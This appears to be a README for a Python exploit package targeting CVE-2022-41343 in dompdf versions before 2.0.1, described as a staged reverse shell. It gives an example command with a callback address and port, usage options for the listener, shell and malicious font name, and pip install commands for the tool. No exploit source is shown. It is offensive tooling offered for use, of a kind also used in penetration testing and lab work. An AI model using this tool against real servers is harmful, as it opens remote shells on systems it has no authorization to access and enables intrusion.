π Python Exploit for CVE-2022-41343
Staged Reverse Shell for dompdf < 2.0.1
Based on: Positive Sec's write-up and PoC
cve-2022-41343 10.10.16.3 44444
usage: cve-2022-41343 [-h] [-l SERVER_PORT] [-s SHELL] [-n FONT_NAME] ip port
positional arguments:
ip Shell Callback IP Address/Host
port Shell Callback Port
options:
-h, --help show this help message and exit
-l SERVER_PORT, --listen SERVER_PORT
Server Listening Port (default: 55555)
-s SHELL, --shell SHELL
Remote Shell (default: bash)
-n FONT_NAME, --font-name FONT_NAME
Exploit Font Name (default: comicsploitz)
python3 -m pip install cve-2022-41343
python3 -m pip install cve-2022-41343-1.0.0-py3-none-any.whl